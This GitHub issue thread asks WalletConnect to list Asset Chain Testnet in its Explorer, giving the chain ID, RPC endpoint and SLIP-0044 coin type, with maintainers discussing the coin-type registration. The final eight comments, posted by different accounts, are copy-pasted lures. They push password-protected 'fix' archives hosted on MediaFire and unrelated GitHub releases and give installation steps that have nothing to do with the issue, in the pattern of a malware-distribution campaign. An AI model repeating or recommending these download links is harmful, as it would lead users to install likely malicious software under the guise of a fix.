### ISSUE TITLE
Adding Support for Asset Chain Testnet

### ISSUE THREAD

**Issue by theiceeman** [WalletConnect/walletconnect-monorepo#5267]
**Adding a new chain to the Explorer**
To get a new chain added to the Explorer, you will need to submit the following:

1. JSON-RPC spec for Wallets **(only if [one](https://docs.walletconnect.com/2.0/advanced/rpc-reference/ethereum-rpc) doesn't already exist)**. For more information, please review the Ethereum [JSON-RPC API docs](https://ethereum.org/en/developers/docs/apis/json-rpc/).
   **GitHub Link**:
   
2. Write a [CASA namespace spec](https://github.com/ChainAgnostic/namespaces) if not already available for this namespace.
Ethereum

3. **namespaces**:
eip:155

4. **chains**:
   Asset Chain Testnet is eip155:42421

5. **RPC endpoints**
   https://enugu-rpc.assetchain.org

6. **[SLIP-0044](https://github.com/satoshilabs/slips/blob/master/slip-0044.md) coin type**:
   _\* slip44 coin type used in the namespace_

Coin type: 1179993451 
Path component : 0xc655456b

**References**
To ensure timely processing of your request, please provide the following references:

- [x] Source of RPC endpoints (e.g. RPC docs): https://docs.assetchain.org/general-info/network-details
- [x] Source of namespace (if non-EIP155) chain information (particularly chainIds): [link]

**Additional context**
Add any other context here.

---

**Please note:**

**Registering a chain with the Explorer does not impact or improve the ability for wallets and dapps to support your chain.** It is simply a way for users to discover wallets and dapps that support your chain by:

- Browsing the [Chains List](https://docs.walletconnect.com/advanced/multichain/chain-list)
- Filtering results programmatically via the [Explorer API](https://docs.walletconnect.com/cloud/explorer)

**It is still up to wallets and dapps to provide concrete support for your chain once it is listed as part of the Explorer.**

- [x] I have read and understood the above clarification

**Comment by KodeSage** [comment]
@bpierre

**Comment by theiceeman** [comment]
Hello @Cali93, Pls review our pr so projects on Asset Chain can easily integrate with wallet-connect.

**Comment by theiceeman** [comment]
Hello @Cali93 
Im checking in, regarding Asset Chain's integration with wallet-connect.
Is there any detail we are missing?
Thanks.

**Comment by Cali93** [comment]
Hey @theiceeman, we will get this done by the end of the week. Is your chain using ether as the native token ?

**Comment by KodeSage** [comment]
> Hey @theiceeman, we will get this done by the end of the week. Is your chain using ether as the native token ?

Hi @Cali93 , it uses a native token, $RWA.

**Comment by Cali93** [comment]
In that case you need to make a PR against https://github.com/satoshilabs/slips/blob/master/slip-0044.md

**Comment by theiceeman** [comment]
Hello  @Cali93 

> In that case you need to make a PR against https://github.com/satoshilabs/slips/blob/master/slip-0044.md

Okay, I've created a pr here: https://github.com/satoshilabs/slips/pull/1779

Although i dont think it should be a blocker to our pr on wallet-connect, 
since Asset Chain is an evm chain, and the address format is same with other evm-chains 
like Ethereum, Binance Smart Chain and the likes.

What do you think pls?

**Comment by theiceeman** [comment]
Hi @Cali93 
Our PR has been merged, and we've been assigned a coin type.
We can proceed here.

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
